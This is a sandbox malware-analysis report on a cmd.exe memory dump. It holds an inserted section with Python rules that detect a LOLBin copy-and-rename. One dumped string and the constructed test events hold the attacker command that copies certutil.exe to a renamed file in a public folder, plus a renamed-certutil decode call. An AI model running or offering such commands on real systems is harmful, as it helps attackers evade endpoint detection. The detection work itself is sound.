                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                              • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                              • API String ID: 4111365348-3662956551
                                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                              • Instruction ID: 686c20a036e981674a65bd778e9be8862310830616596b24a41d0e2063c14af3
                                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                              • Instruction Fuzzy Hash: 32E1B023E0869286EB608B65E8503F966A1FF4D7ACF444131DA0ED76B4DF3EE504C74A
                                              APIs
                                              • _wcsupr.MSVCRT ref: 00007FF6EB19EF33
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EF98
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EFA9
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EFBF
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6EB19EFDC
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19EFED
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F003
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F022
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F083
                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F092
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F0A5
                                              • towupper.MSVCRT ref: 00007FF6EB19F0DB
                                              • wcschr.MSVCRT ref: 00007FF6EB19F135
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F16C
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB19F185
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                              • String ID: <noalias>$CMD.EXE
                                              • API String ID: 1161012917-1690691951
                                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                              • Instruction ID: 7c1954f321e39cdfc1a648c1f868064125b195cd4fa45f871415bb3756da6a57
                                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                              • Instruction Fuzzy Hash: 48918423B0969296FB149B60E4103FD6AA1BF4DB7CF488135DD0E926E5DF3EE4498306
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1732F3
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6EB1732A4), ref: 00007FF6EB173309
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6EB173384
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB1911DF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                              • String ID:
                                              • API String ID: 611521582-0
                                              • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                              • Instruction ID: f62325fa2ac6e02dbbb0105e46924a4d3f2d07f0cab4601ce4728b0a59277332
                                              • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                              • Instruction Fuzzy Hash: F9A1D223F086129AF7188B61E9443FDA6A1FB4DB6DF444035CD0EC77A4DF3EA4498609
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                              • String ID: \\?\
                                              • API String ID: 628682198-4282027825
                                              • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                              • Instruction ID: 71521873a1399bf23577078317561a2343353631847cb25c65d7bae189f27577
                                              • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                              • Instruction Fuzzy Hash: 83E1AE23A0869286EB609B24D8403F963A1FB4E76DF404135DA0E877E4EF7EE659C345
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                              • String ID:
                                              • API String ID: 16309207-0
                                              • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                              • Instruction ID: c8bc83912626709702a7af16bb5ac7926e80c5c5ee9565d2cb6209236a192cf3
                                              • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                              • Instruction Fuzzy Hash: 1F229D63B04BC286EB659F24D8543FA63A0FB4D7A8F404135DA0E8BBA9DF3DE1458705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                              • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 3863671652-4137775220
                                              • Opcode ID: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
                                              • Instruction ID: 959c0ff4beb26df3bbfb2e9e84290b437982bb6485d834b1e14af4837c58fbd2
                                              • Opcode Fuzzy Hash: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
                                              • Instruction Fuzzy Hash: 41E1B863E0969682FA609B14E4543F926A0BF8E778F544035DA0EC33F4DF7EE845874A
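The dumped module is cmd.exe itself (its strings are COPYCMD, DPATH, the default PATHEXT list and the ASSOC/FTYPE registry path), so the one attacker-controlled item in this listing is the command line sitting in its memory: extrac32 /C /Y copying certutil.exe to C:\Users\Public\kn.exe, a LOLBin copy-and-rename that defeats rules keyed on the image name. The detection below is an added example, not part of the Joe Sandbox report or the sample. It assumes process-creation events in the shape of Sysmon Event ID 1 fields (Image, CommandLine, OriginalFileName); the events, PIDs and the kn.exe arguments are constructed, and the LOLBIN list is the editor's choice. Only the extrac32 command line is taken from the dump.

```python
"""Added example, not part of the Joe Sandbox report or the sample: detection
logic for the LOLBin copy-and-rename pattern whose command line is recorded
in the cmd.exe dump above. Events are constructed here in the shape of
Sysmon Event ID 1 fields (Image, CommandLine, OriginalFileName)."""
import ntpath
import re

# System tools attackers copy under a new name to slip past image-name based
# HIPS/EDR rules (the sample copied certutil.exe; cmd.exe is another favourite).
LOLBINS = {"certutil.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "powershell.exe", "bitsadmin.exe"}
# Directories where these binaries legitimately live.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def in_trusted_dir(path):
    """True if the normalised, lower-cased path sits under a system directory."""
    return ntpath.normpath(path).lower().startswith(TRUSTED_DIRS)


def detect_lolbin_copy(event):
    """Rule 1: extrac32 in /C (copy) mode moving a LOLBin out of its system
    directory, the exact command line found in the dump. Returns an alert or None."""
    name = ntpath.basename(event["Image"]).lower()
    orig = (event.get("OriginalFileName") or "").lower()
    if name != "extrac32.exe" and orig != "extrac32.exe":
        return None
    flags, args, skip = [], [], False
    for tok in tokenize(event["CommandLine"])[1:]:
        if skip:                      # consume the directory that follows /L
            skip = False
            continue
        if tok.startswith("/"):
            flags.append(tok.lower())
            skip = tok.lower() == "/l"
        else:
            args.append(tok)
    if "/c" not in flags or len(args) < 2:
        return None                   # /D, /E, /L: genuine CAB extraction
    src, dst = args[-2], args[-1]
    src_name, dst_name = ntpath.basename(src).lower(), ntpath.basename(dst).lower()
    if src_name not in LOLBINS or in_trusted_dir(dst):
        return None
    return {"rule": "extrac32_lolbin_copy", "pid": event["ProcessId"],
            "source": src, "destination": dst, "renamed": src_name != dst_name}


def detect_renamed_lolbin(event):
    """Rule 2: a process whose PE version info (OriginalFileName) says it is a
    system tool but which runs under another name or from another path.
    Needs Sysmon; the Security 4688 event does not carry OriginalFileName."""
    orig = (event.get("OriginalFileName") or "").lower()
    image = event["Image"]
    if orig not in LOLBINS:
        return None
    if ntpath.basename(image).lower() == orig and in_trusted_dir(image):
        return None
    return {"rule": "renamed_lolbin_exec", "pid": event["ProcessId"], "image": image,
            "original_name": orig, "command_line": event["CommandLine"]}


def scan(events):
    """Run both rules over a list of process-creation events; return the alerts."""
    alerts = []
    for event in events:
        for rule in (detect_lolbin_copy, detect_renamed_lolbin):
            hit = rule(event)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed events (PIDs and the kn.exe arguments are made up); the second
# entry carries the command line recovered from the cmd.exe dump verbatim.
SAMPLE_EVENTS = [
    {"ProcessId": 6001, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c dir"},
    {"ProcessId": 7001, "Image": r"C:\Windows\System32\extrac32.exe",
     "OriginalFileName": "EXTRAC32.EXE",
     "CommandLine": r"extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe"},
    {"ProcessId": 7002, "Image": r"C:\Users\Public\kn.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"C:\Users\Public\kn.exe -decode C:\Users\Public\in.txt C:\Users\Public\out.bin"},
    {"ProcessId": 7003, "Image": r"C:\Windows\System32\extrac32.exe",
     "OriginalFileName": "EXTRAC32.EXE",
     "CommandLine": r"extrac32 /Y /E /L C:\Temp\out C:\Temp\drivers.cab"},
    {"ProcessId": 7004, "Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -verifystore root"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Rule 1 fires on the copy itself, rule 2 on the later execution of the renamed binary; on the constructed events only the extrac32 /C copy and the kn.exe launch alert, while ordinary certutil, cmd.exe and a real CAB extraction with /E /L stay quiet. Rule 2 depends on Sysmon's OriginalFileName field, which comes from the PE version resource and survives a rename; without Sysmon, hash the image and compare it with the catalogue hash of System32\certutil.exe instead.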
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                              • String ID: $Application$System
                                              • API String ID: 3538039442-1881496484
                                              • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                              • Instruction ID: 9d62d770d2eea2714e850576a39337de919e57c0522b6ad97ae7ba1af9673be4
                                              • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                              • Instruction Fuzzy Hash: A251B233A08B4196E7248B55F4003BABAA1FB8DB68F544134DE4E837A4DF3EE459CB05
                                              APIs
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB19048E), ref: 00007FF6EB19DA58
                                              • memset.MSVCRT ref: 00007FF6EB19DAD6
                                              • memset.MSVCRT ref: 00007FF6EB19DAFC
                                              • memset.MSVCRT ref: 00007FF6EB19DB22
                                                • Part of subcall function 00007FF6EB183A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB19EAC5,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB183A56
                                                • Part of subcall function 00007FF6EB175194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF6EB1751C4
                                                • Part of subcall function 00007FF6EB18823C: FindFirstFileExW.KERNELBASE ref: 00007FF6EB188280
                                                • Part of subcall function 00007FF6EB18823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB18829D
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                                • Part of subcall function 00007FF6EB174FE8: _get_osfhandle.MSVCRT ref: 00007FF6EB175012
                                                • Part of subcall function 00007FF6EB174FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB175030
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB19DDB0
                                                • Part of subcall function 00007FF6EB1759E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB175A2E
                                                • Part of subcall function 00007FF6EB1759E4: _open_osfhandle.MSVCRT ref: 00007FF6EB175A4F
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB19DDEB
                                              • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB19DDFA
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB19E204
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB19E223
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB19E242
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                              • String ID: %9d$%s$~
                                              • API String ID: 3651208239-912394897
                                              • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                              • Instruction ID: 7387756f9749e30bb22a2a297b5c660688b4af3fa275143ddb420b4fad3b7b39
                                              • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                              • Instruction Fuzzy Hash: 7E429133A0C6C286EB659F20E8503F973A1FB49768F504036E64DC7AA9DF3EE5458706
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                              • String ID: COPYCMD$\
                                              • API String ID: 3989487059-1802776761
                                              • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                              • Instruction ID: 2c759cebcb78f87ce1c482d8f7df556f69f9e91633648c6b657cad4145feb2e8
                                              • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                              • Instruction Fuzzy Hash: 6AF1C127A0879691EA149B15E5403FA63A0FF4EBACF148135CA4E877F4EE7EE0958305
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Time$File$System$FormatInfoLocalLocale
                                              • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                              • API String ID: 55602301-2548490036
                                              • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                              • Instruction ID: 913dbcb920f0d323e525d5dd264ee51bf6565db9a98198c8be1aff23f1f2fcdc
                                              • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                              • Instruction Fuzzy Hash: 40A16E33A1C64296EB108B10F4403FAB7A5FB89768F504135EA4E87AB4EF3DE545C74A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                              • String ID:
                                              • API String ID: 3935429995-0
                                              • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                              • Instruction ID: 485958f5b9998107d57d67017590050f1746bda67dbcd81ef944284f721f32c3
                                              • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                              • Instruction Fuzzy Hash: 8061D327A1875282E7108F61A4047B9BBA4FF8EF68F059534DE4E837A0DF3DE4058B05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
